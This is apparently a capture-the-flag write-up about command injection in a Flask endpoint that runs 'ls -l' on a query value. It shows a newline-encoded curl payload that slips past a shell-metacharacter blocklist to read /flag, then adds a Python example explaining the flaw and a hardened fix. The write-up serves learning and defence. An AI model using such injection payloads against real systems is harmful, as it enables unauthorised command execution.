cat /challenge/server
The Flask app takes a path as a query parameter (/exercise?subdirectory) and executes ls -l {subdirectory}
Problem: the special characters ; & | > < ( ) ` $ are all blocked.
We know that a newline can also be used as a command separator.
Executing:
ls -l .
cat /flag
Start the server and use curl:
curl http://challenge.localhost:80/exercise?subdirectory=.%0Acat%20/flag
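Why the filter fails and what the fix looks like, as an added example (not the challenge's own code). It assumes the server interpolates the value into a shell string; the names blocklist_allows, shell_command_lines and list_dir_safe are hypothetical.

```python
import os
import subprocess

BLOCKED = set(";&|><()`$")  # the characters the write-up lists as blocked

def blocklist_allows(value: str) -> bool:
    """Assumed reconstruction of the challenge filter (hypothetical name)."""
    return not any(ch in BLOCKED for ch in value)

def shell_command_lines(value: str) -> list[str]:
    """Lines a shell would receive if the value is interpolated into a string."""
    return f"ls -l {value}".split("\n")

def list_dir_safe(value: str, base: str = ".") -> str:
    """Hardened variant: no shell, one argv entry, path confined to base."""
    root = os.path.realpath(base)
    target = os.path.realpath(os.path.join(root, value))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes the base directory")
    if not os.path.isdir(target):
        raise ValueError("not an existing directory")
    # argv list: the value is never parsed by a shell, so newlines,
    # semicolons and the rest are just bytes in a file name.
    # "--" stops ls from reading a leading "-" as an option.
    done = subprocess.run(["ls", "-l", "--", target],
                          capture_output=True, text=True, check=True)
    return done.stdout

if __name__ == "__main__":
    sample = ".\ncat /flag"  # decoded form of the query value used above
    print(blocklist_allows(sample))       # the blocklist lets it through
    print(shell_command_lines(sample))    # two separate command lines
    try:
        list_dir_safe(sample)
    except ValueError as err:
        print("rejected:", err)
```

The fix is structural: with an argument list there is no separator to filter, so the blocklist becomes unnecessary.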